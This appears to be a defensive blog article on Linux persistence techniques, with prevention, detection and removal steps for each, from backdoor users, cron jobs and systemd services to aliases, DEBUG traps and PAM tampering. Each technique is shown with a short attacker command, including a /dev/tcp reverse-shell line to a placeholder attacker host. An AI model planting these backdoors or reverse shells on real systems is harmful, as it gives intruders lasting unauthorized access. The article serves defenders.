Persistence Mechanisms
Persistence is one of the most critical stages in a cyberattack: once an attacker has access, they want to make sure they can come back even if their initial entry point is closed. At Black Hat USA 2025, John Hammond presented several lesser-known Linux persistence techniques that defenders should be aware of.
In this article, I’ll review both common and lesser-known techniques, and, most importantly, how to prevent, detect, and remove them.
Common Persistence Techniques
1. Adding a Backdoor User
adduser attacker
usermod -aG sudo attacker
Prevention
Enforce centralized authentication (LDAP, AD, or PAM hardening).
Disable direct root login; use only known accounts with key-based auth.
Use tools like aide or osquery to monitor system files.
Detection
Check
/etc/passwd
and/etc/shadow
for unexpected users.Audit
/etc/group
for sudo/wheel membership.Use
lastlog
to spot accounts that suddenly appear.
Removal
deluser attacker
(oruserdel -r attacker
).Review
/home/attacker
for artifacts.
2. Adding SSH Keys
ssh-copy-id user@<VICTIM_IP>
Prevention
Restrict permissions:
chmod 600 ~/.ssh/authorized_keys
.Use centralized key management.
Monitor with auditd for changes to
.ssh
directories.
Detection
Inspect
~/.ssh/authorized_keys
for unknown keys.Audit
/etc/ssh/sshd_config
for unusual settings (AuthorizedKeysCommand
).Look for hidden files like
/opt/.hiddenkeys
.
Removal
Remove the malicious key line from
authorized_keys
.Restart SSH if system-wide config was modified.
3. Cron Jobs
echo "<frequency> backdoor_script" | crontab -
Prevention
Restrict cron usage to trusted users (
/etc/cron.allow
,/etc/cron.deny
).Monitor changes with auditd.
Detection
Run
crontab -l
for each user.Inspect
/etc/crontab
,/etc/cron.*
.Use
systemctl list-timers
.
Removal
Delete the malicious entry.
Kill any still-running process started by it.
4. Systemd Services
Malicious .service
files:
[Service]
ExecStart=/usr/bin/<backdoor>
Prevention
Restrict
sudo
usage; don’t allow untrusted users to modify/etc/systemd/
.Use tripwire/aide to monitor changes.
Detection
systemctl list-unit-files | grep enabled
.Look for strange files in
/etc/systemd/system/
.Check logs:
journalctl -u <service>
.
Removal
systemctl disable <malicious>.service
systemctl stop <malicious>.service
rm /etc/systemd/system/<malicious>.service
5. RC Files (.bashrc
, .profile
, etc.)
.bashrc
, .profile
, etc.)Malicious lines in shell startup files:
bash -i >& /dev/tcp/<attacker>/4444 0>&1
Prevention
Apply least privilege: don’t allow attackers to write to home dirs.
Use restricted shells where possible.
Detection
Inspect hidden dotfiles in
/home/*
.Look for suspicious commands (
netcat
,bash -i
,curl | sh
).Use integrity monitoring.
Removal
Remove injected lines.
Rebuild affected dotfiles if unsure.
Lesser-Known Persistence Techniques
6. Environment Variables
export PROMPT_COMMAND="<backdoor> &"
Prevention
Restrict write access to environment configs.
Regular audits of environment variables.
Detection
printenv
for unusual variables.Audit
/etc/environment
and/etc/profile.d/
.
Removal
unset PROMPT_COMMAND
.Clean
.bashrc
,.profile
,/etc/profile.d/
.
7. Trap Debug Hijack
trap "<backdoor> &" DEBUG
Prevention
Lock down dotfiles.
Monitor for shell modifications.
Detection
Inspect
~/.bashrc
fortrap
commands.trap -p
to list active traps.
Removal
trap - DEBUG
Then clean startup files.
8. Aliases
alias ls="backdoor & ls --color=auto"
Prevention
Enforce minimal shell profiles.
Integrity monitoring.
Detection
Run
alias
to list defined aliases.Inspect
~/.bashrc
,~/.zshrc
,/etc/bash.bashrc
.
Removal
unalias ls
Remove alias definitions from dotfiles.
grep -r "alias" /
9. SSH Config Abuse
Host *
ProxyCommand <backdoor> %h %p
Prevention
Enforce strict permissions:
chmod 600
configs.Monitor for hidden files in
/opt/
,/etc/ssh/
.
Detection
Inspect
~/.ssh/config
and/etc/ssh/ssh_config
.Look for
ProxyCommand
or unexpectedAuthorizedKeysCommand
.
Removal
Clean suspicious config directives.
Restart SSH.
10. PAM Degradation
Attackers may patch or replace PAM modules for stealth persistence.
Prevention
Only install signed packages.
Enable kernel module integrity checks (IMA/EVM).
Monitor with osquery.
Detection
Verify PAM configs:
/etc/pam.d/*
.Check integrity of libraries in
/lib/security/
.Use
ldd
to detect replaced shared objects.
Removal
Restore PAM configs from backup.
Reinstall
libpam
packages.
Conclusion
Persistence mechanisms range from blatant (extra users, cron jobs) to subtle (aliases, PAM tampering). The key for defenders is:
Prevent: enforce least privilege, configuration management and root access protection.
Detect: monitor system integrity (
osquery
,aide
,auditd
).Remove: restore from clean backups, audit thoroughly.
Awareness is the first step because persistence is only effective if it goes unnoticed.
Ressources
Last updated